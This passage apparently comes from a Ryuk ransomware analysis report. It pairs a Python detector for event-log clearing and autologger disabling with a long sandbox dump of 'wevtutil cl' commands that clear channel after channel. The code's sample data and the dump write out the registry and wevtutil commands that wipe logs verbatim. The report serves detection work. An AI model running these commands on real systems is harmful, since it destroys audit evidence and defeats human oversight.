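The for loop above enumerates every event channel with wevtutil el and clears each one with wevtutil cl (ATT&CK T1070.001); the Enable=0 written just before it under the EventLog-System autologger key stops a provider feeding that session in the first place (T1562.002). What is left on the host is a burst of wevtutil.exe children under one cmd.exe, which is the signal the detector below keys on. It is an added example for this report, not sandbox output or Ryuk code: the reg add and the for loop are copied from the listing, the per-channel clears are a short subset of the channels listed, and the single administrator clear at the end is constructed to show what does not fire. Rule names and thresholds are this example's own.

```python
"""Detect event-log clearing and logging-pipeline tampering (ATT&CK T1070.001,
T1562.002) in process-creation records.

Added example for this report, not sandbox output. Records are constructed:
the reg add and the for loop are copied from the listing, the per-channel
clears are a subset of the channels listed, and the lone administrator
clear at the end is made up.
"""
import re
from collections import defaultdict

CLEAR_RE = re.compile(
    r'\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+(?:"(?P<q>[^"]+)"|(?P<u>\S+))', re.I)
ENUM_LOOP_RE = re.compile(
    r"\bfor\s+/f\b.*?\bwevtutil(?:\.exe)?\s+el\b.*?\bdo\b.*?\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b",
    re.I | re.S)
AUTOLOGGER_OFF_RE = re.compile(
    r"\\WMI\\Autologger\\EventLog-\w+\\\{[^}]+\}\s+/v\s+Enable\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)

CHANNELS = ["Application", "Security", "System",
            "Microsoft-Windows-AppLocker/EXE and DLL",
            "Microsoft-Windows-CodeIntegrity/Operational",
            "Microsoft-Windows-Bits-Client/Operational",
            "Microsoft-Windows-DNS-Client/Operational",
            "Microsoft-Windows-GroupPolicy/Operational"]


def build_sample_events():
    """Constructed records: ts (seconds), pid, ppid, command line."""
    events = [
        {"ts": 100, "pid": 4000, "ppid": 3000, "cmdline":
         r"C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f"},
        {"ts": 101, "pid": 4001, "ppid": 3000, "cmdline":
         r'''C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"'''},
        {"ts": 101, "pid": 4002, "ppid": 4001, "cmdline": "wevtutil.exe el"},
    ]
    for i, chan in enumerate(CHANNELS):
        events.append({"ts": 102 + i, "pid": 4010 + i, "ppid": 4001,
                       "cmdline": 'wevtutil.exe cl "%s"' % chan})
    # One clear by an administrator hours later: a single event, not a burst.
    events.append({"ts": 9000, "pid": 5200, "ppid": 5100, "cmdline": "wevtutil cl Application"})
    return events


def find_log_clearing(events, window=60, threshold=5):
    """Return findings for the enumerate-and-clear loop, autologger tampering,
    and any parent that spawned >= threshold wevtutil clears within `window` s."""
    findings = []
    clears = defaultdict(list)  # ppid -> [(ts, channel), ...]
    for ev in events:
        cmd = ev["cmdline"]
        if ENUM_LOOP_RE.search(cmd):
            findings.append({"rule": "wevtutil_enumerate_and_clear", "ts": ev["ts"], "pid": ev["pid"]})
            continue  # the loop itself is not one of the per-channel clears
        if AUTOLOGGER_OFF_RE.search(cmd):
            findings.append({"rule": "eventlog_autologger_disabled", "ts": ev["ts"], "pid": ev["pid"]})
        m = CLEAR_RE.search(cmd)
        if m:
            clears[ev["ppid"]].append((ev["ts"], m.group("q") or m.group("u")))
    for ppid, items in clears.items():
        items.sort()
        start = 0
        for end in range(len(items)):  # sliding window over clear timestamps
            while items[end][0] - items[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                findings.append({"rule": "wevtutil_mass_clear", "ppid": ppid,
                                 "count": len(items),
                                 "channels": [c for _, c in items]})
                break
    return findings


if __name__ == "__main__":
    for f in find_log_clearing(build_sample_events()):
        print(f)
```

Process-creation telemetry is the right source here because the clears also wipe the logs that would otherwise record them; the one trace left on the host is that clearing the Security log writes Event ID 1102 and clearing any other channel writes Event ID 104 to the System log, so a System log holding nothing but a run of 104 events is the post-condition to look for when the process telemetry is gone too.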

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Application"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DebugChannel"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowFilterGraph"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "DirectShowPluginControl"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Els_Hyphenation/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "EndpointMapper"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "ForwardedEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "HardwareEvents"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Internet Explorer"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Key Management Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MF_MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Media Center"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationDeviceProxy"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPerformance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MCT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\system32\wevtutil.exe

